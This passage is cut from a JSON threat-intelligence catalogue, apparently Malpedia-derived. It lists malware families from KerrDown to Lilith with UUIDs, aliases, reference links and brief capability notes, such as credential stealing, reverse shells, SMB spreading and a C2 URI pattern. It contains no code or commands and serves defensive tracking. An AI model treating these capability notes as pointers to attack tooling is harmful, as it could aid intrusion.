"https://www.secureworks.com/research/threat-profiles/tin-woodlawn", "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], "type": [] }, "uuid": "bd9e21d1-7da3-4699-816f-0e368a63bc18", "value": "KerrDown" }, { "description": "Ketrican is a backdoor trojan used by APT 15.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" ], "synonyms": [], "type": [] }, "uuid": "86cd2563-b343-4cce-ac2d-a17afbc77dfd", "value": "Ketrican" }, { "description": "Intezer found this family mid May 2020, which appears to be a merger of the family Ketrican and Okrum.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum", "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" ], "synonyms": [], "type": [] }, "uuid": "99d6cb80-bae2-4a97-8ec7-401f9570f237", "value": "Ketrum" }, { "description": "KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase", "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/", "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html", "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/", "https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017", "https://voidsec.com/keybase-en/", "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/", "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/" ], "synonyms": [ "Kibex" ], "type": [] }, "uuid": "8a7bb20e-7e90-4330-8f53-744bd5519f6f", "value": "KeyBase" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", "https://citizenlab.ca/2016/11/parliament-keyboy/", "https://www.secureworks.com/research/threat-profiles/bronze-hobart", "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html" ], "synonyms": [ "TSSL" ], "type": [] }, "uuid": "28c13455-7f95-40a5-9568-1e8732503507", "value": "KeyBoy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/", "https://twitter.com/smoothimpact/status/773631684038107136", "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" ], "synonyms": [], "type": [] }, "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", "value": "APT3 Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://research.checkpoint.com/north-korea-turns-against-russian-targets/" ], "synonyms": [], "type": [] }, "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", "value": "KEYMARBLE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy", "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" ], "synonyms": [], "type": [] }, "uuid": "d073b11a-a941-48b9-8e88-b59ffab9fcda", "value": "KGH_SPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", "https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/", "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/" ], "synonyms": [], "type": [] }, "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", "value": "KHRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", "value": "Kikothac" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", "https://www.secureworks.com/research/threat-profiles/iron-viking", "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" ], "synonyms": [], "type": [] }, "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", "value": "KillDisk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimjongrat", "https://www.reuters.com/article/us-usa-election-cyber-louisiana-exclusiv/exclusive-national-guard-called-in-to-thwart-cyberattack-in-louisiana-weeks-before-election-idUSKBN27823F" ], "synonyms": [], "type": [] }, "uuid": "61edd17b-322d-45dc-a6a0-31c13ec2338e", "value": "KimJongRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky", "https://blog.prevailion.com/2019/09/autumn-aperture-report.html", "https://metaswan.github.io/posts/Malware-Kimsuky-group's-resume-impersonation-malware", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/", "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", "https://blog.alyac.co.kr/2347", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf" ], "synonyms": [], "type": [] }, "uuid": "860643d6-5693-4e4e-ad1f-56c49faa10a7", "value": "Kimsuky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", "https://www.vkremez.com/2018/10/lets-learn-exploring-zeusvm-banking.html", "https://github.com/nyx0/KINS" ], "synonyms": [ "Kasper Internet Non-Security", "Maple" ], "type": [] }, "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", "value": "KINS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html" ], "synonyms": [], "type": [] }, "uuid": "6c585194-96d3-463d-ac21-aa942439cc26", "value": "KIVARS" }, { "description": "Microsoft describes that threat actor ZINC is using Klackring as a malware dropped by ComeBacker, both being used to target security researchers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klackring", "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/" ], "synonyms": [], "type": [] }, "uuid": "03a4eb90-8d88-49c7-a973-2201115ea5a8", "value": "Klackring" }, { "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer" ], "synonyms": [ "Joglog", "Parasite" ], "type": [] }, "uuid": "618b6f23-fc83-4aff-8b0a-7f7138be625c", "value": "KleptoParasite Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html" ], "synonyms": [], "type": [] }, "uuid": "70459959-5a20-482e-b714-2733f5ff310e", "value": "KLRD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.knot", "https://twitter.com/malwrhunterteam/status/1345313324825780226" ], "synonyms": [], "type": [] }, "uuid": "0479b7cd-982e-430e-a96e-338aec8ae3cf", "value": "Knot Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", "https://blog.tofile.dev/2020/11/28/koadic_jarm.html", "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf", "https://github.com/zerosum0x0/koadic", "https://www.secureworks.com/research/threat-profiles/cobalt-ulster" ], "synonyms": [], "type": [] }, "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", "value": "Koadic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", "https://twitter.com/struppigel/status/812726545173401600" ], "synonyms": [], "type": [] }, "uuid": "f7674d06-450a-4150-9180-afef94cce53c", "value": "KokoKrypt" }, { "description": "KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99", "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" ], "synonyms": [ "Splinter RAT" ], "type": [] }, "uuid": "116f4c5f-fd51-4e90-995b-f16c46523c06", "value": "KOMPROGO" }, { "description": "Konni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims are South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", "https://blog.alyac.co.kr/2474", "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-227a", "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant", "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b", "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/" ], "synonyms": [], "type": [] }, "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", "value": "Konni" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" ], "synonyms": [], "type": [] }, "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", "value": "KoobFace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", "https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/", "https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/", "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf", "https://securitykitten.github.io/2014/11/25/curious-korlia.html", "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf", "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit", "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html", "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", "https://asec.ahnlab.com/1298", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-huntley", "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf", "https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment" ], "synonyms": [ "Bisonal" ], "type": [] }, "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", "value": "Korlia" }, { "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", "https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update", "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless", "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/" ], "synonyms": [], "type": [] }, "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", "value": "Kovter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", "https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware", "https://isc.sans.edu/diary/26010", "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/", "https://isc.sans.edu/diary/25934", "https://news.drweb.com/show/?i=13242&lng=en", "https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/", "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md" ], "synonyms": [ "Khalesi", "Kpot" ], "type": [] }, "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", "value": "KPOT Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken", "https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/", "https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/", "https://www.recordedfuture.com/kraken-cryptor-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "3d7ae6b9-8161-470e-a7b6-752151b21657", "value": "Kraken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/" ], "synonyms": [ "BlackMoon" ], "type": [] }, "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", "value": "KrBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader" ], "synonyms": [], "type": [] }, "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", "value": "KrDownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/", "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", "https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", "https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", "https://twitter.com/3xp0rtblog/status/1294157781415743488", "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" ], "synonyms": [ "Osiris" ], "type": [] }, "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", "value": "Kronos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kryptocibule", "https://www.welivesecurity.com/2020/09/02/kryptocibule-multitasking-multicurrency-cryptostealer/" ], "synonyms": [], "type": [] }, "uuid": "8039c56c-3be1-4344-81cf-6c21b06bbaa6", "value": "KryptoCibule" }, { "description": "A keylogger used by Turla.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t", "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/", "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/", "https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/" ], "synonyms": [], "type": [] }, "uuid": "aa93d030-abef-4215-bc9e-6c7483562d19", "value": "KSL0T" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" ], "synonyms": [ "Barys", "Gofot", "Kuaibpy" ], "type": [] }, "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", "value": "Kuaibu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" ], "synonyms": [], "type": [] }, "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", "value": "Kuluoz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", "value": "Kurton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki", "https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/" ], "synonyms": [], "type": [] }, "uuid": "ff40299b-dc45-4a1c-bfe2-3864682b8fea", "value": "Kutaki" }, { "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", "https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat", "https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/", "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/", "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/", "http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html", "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" ], "synonyms": [], "type": [] }, "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", "value": "Kwampirs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer", "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", "https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/", "https://twitter.com/luc4m/status/1276477397102145538", "https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/" ], "synonyms": [], "type": [] }, "uuid": "62f1846f-3026-4824-b739-8f9ae5e9c8bb", "value": "LALALA Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", "https://www.youtube.com/watch?v=jeLd-gw2bWo", "https://ti.qianxin.com/blog/articles/network-weapons-of-cia/", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" ], "synonyms": [ "Plexor" ], "type": [] }, "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", "value": "Lambert" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" ], "synonyms": [], "type": [] }, "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", "value": "Lamdelin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access", "http://malware-traffic-analysis.net/2017/04/25/index.html", "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/" ], "synonyms": [], "type": [] }, "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", "value": "LatentBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo", "https://seclists.org/snort/2019/q3/343" ], "synonyms": [], "type": [] }, "uuid": "e1958a69-49c3-43a2-ba80-6e5cd5bbcd13", "value": "Laturo Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" ], "synonyms": [], "type": [] }, "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", "value": "Laziok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat", "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" ], "synonyms": [], "type": [] }, "uuid": "454db469-724a-4084-873c-906abf91d0d5", "value": "LazyCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot", "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html" ], "synonyms": [], "type": [] }, "uuid": "23dd327e-5d1d-4b75-993e-5d79d9fc0a70", "value": "LCPDot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall", "https://id-ransomware.blogspot.com/2020/09/leakthemall-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "526add8e-ed78-4e8e-8d4c-152570fe566e", "value": "Leakthemall Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "synonyms": [], "type": [] }, "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", "value": "Leash" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html", "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html" ], "synonyms": [ "shoco" ], "type": [] }, "uuid": "41da41aa-0729-428a-8b82-636600f8e230", "value": "Leouncia" }, { "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", "http://www.malware-traffic-analysis.net/2017/11/02/index.html", "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/" ], "synonyms": [], "type": [] }, "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc", "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html" ], "synonyms": [], "type": [] }, "uuid": "ed825d46-be1e-4d36-b828-1b85274773dd", "value": "Liderc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/", "https://securelist.com/apt-trends-report-q2-2018/86487/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments", "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf", "https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/" ], "synonyms": [ "NETTRANS", "XTRANS" ], "type": [] }, "uuid": "96b0b8fa-79b6-4519-a794-f6f325f96fd7", "value": "LightNeuron" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac", "https://securelist.com/atm-infector/74772/", "http://atm.cybercrime-tracker.net/index.php" ], "synonyms": [], "type": [] }, "uuid": "7d328c7b-7dc8-4891-bbd1-a05dedc8bac4", "value": "Ligsterac" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith", 